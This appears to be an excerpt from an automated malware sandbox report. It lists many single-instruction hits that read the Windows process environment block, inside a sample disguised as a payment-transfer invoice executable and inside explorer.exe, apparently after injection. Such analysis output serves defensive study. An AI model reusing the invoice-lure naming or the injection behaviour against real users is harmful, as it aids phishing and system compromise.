          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeCode function: 4_2_0107FF10 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeCode function: 4_2_00FF76E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeCode function: 4_2_0101E730 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeCode function: 4_2_010B8F6A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeCode function: 4_2_00FF766D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeCode function: 4_2_01067794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeCode function: 4_2_01067794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeCode function: 4_2_01067794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeCode function: 4_2_00FF7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeCode function: 4_2_00FF7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeCode function: 4_2_00FF7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeCode function: 4_2_00FF7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeCode function: 4_2_00FF7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeCode function: 4_2_00FF7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeCode function: 4_2_00FEE620 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeCode function: 4_2_010237F5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeCode function: 4_2_00FEC600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeCode function: 4_2_00FEC600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeCode function: 4_2_00FEC600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeCode function: 4_2_01018E00 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeCode function: 4_2_010A1608 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeCode function: 4_2_0101A61C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeCode function: 4_2_0101A61C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeCode function: 4_2_0109FE3F mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeCode function: 4_2_00FF8794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeCode function: 4_2_0100AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeCode function: 4_2_0100AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeCode function: 4_2_0100AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeCode function: 4_2_0100AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeCode function: 4_2_0100AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeCode function: 4_2_0107FE87 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeCode function: 4_2_00FFFF60 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeCode function: 4_2_010646A7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeCode function: 4_2_010B0EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeCode function: 4_2_010B0EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeCode function: 4_2_010B0EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeCode function: 4_2_00FFEF40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeCode function: 4_2_01028EC7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeCode function: 4_2_0109FEC0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeCode function: 4_2_010136CC mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeCode function: 4_2_00FE4F2E mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeCode function: 4_2_00FE4F2E mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeCode function: 4_2_010B8ED6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeCode function: 4_2_010116E0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04CF8CD6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04CE14FB mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04CA6CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04CA6CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04CA6CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04C3849B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04C5A44B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04CBC450 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04CBC450 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04C4746D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04CA6C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04CA6C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04CA6C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04CA6C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04CF740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04CF740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04CF740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04CE1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04CE1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04CE1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04CE1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04CE1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04CE1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04CE1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04CE1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04CE1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04CE1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04CE1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04CE1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04CE1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04CE1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04C5BC2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04CA6DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04CA6DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04CA6DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04CA6DC9 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04CA6DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04CA6DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04C3D5E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04C3D5E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04CEFDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04CEFDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04CEFDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04CEFDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04CD8DF1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04C52581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04C52581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04C52581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04C52581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04C22D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04C22D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04C22D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04C22D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04C22D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04C5FD9B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04C5FD9B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04CF05AC mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04CF05AC mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04C535A1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04C51DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04C51DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04C51DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04C63D43 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04CA3540 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04C47D50 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04C4C577 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04C4C577 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04C2AD30 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04C33D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04C33D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04C33D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04C33D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04C33D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04C33D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04C33D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04C33D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04C33D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04C33D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04C33D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04C33D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04C33D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04CEE539 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04CF8D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04CAA537 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04C54D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04C54D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04C54D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04C68EC7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04C536CC mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04CDFEC0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04CF8ED6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04C376E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04C516E0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04CBFE87 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04CF0EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04CF0EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04CF0EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04CA46A7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04C37E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04C37E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04C37E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04C37E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04C37E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04C37E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04CEAE44 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04CEAE44 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04C3766D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04C4AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04C4AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04C4AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04C4AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04C4AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04C2C600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04C2C600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04C2C600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04C58E00 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04CE1608 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04C5A61C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04C5A61C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04C2E620 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04CDFE3F mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04C637F5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04C38794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04CA7794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04CA7794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04CA7794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04C3EF40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04C3FF60 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04CF8F6A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04CF070D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04CF070D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04C5A70E mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04C5A70E mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04C4F716 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04CBFF10 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04CBFF10 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04C24F2E mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04C24F2E mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04C5E730 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04CBB8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04CBB8D0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04CBB8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04CBB8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04CBB8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04CBB8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04C258EC mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04C29080 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04CA3884 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04CA3884 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04C520A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04C520A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04C520A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04C520A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04C520A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04C520A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04C690AF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04C5F0BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04C5F0BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04C5F0BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04C40050 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04C40050 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04CF1074 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04CE2073 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04CF4015 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04CF4015 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04CA7016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04CA7016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04CA7016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04C5002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04C5002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04C5002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04C5002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04C5002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04C3B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04C3B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04C3B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04C3B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04CB41E8 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04C2B1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04C2B1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04C2B1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04C5A185 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04C4C182 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04C52990 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04C561A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04C561A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04CA69A6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04CA51BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04CA51BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04CA51BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04CA51BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04C4B944 mov eax, dword ptr fs:[00000030h]
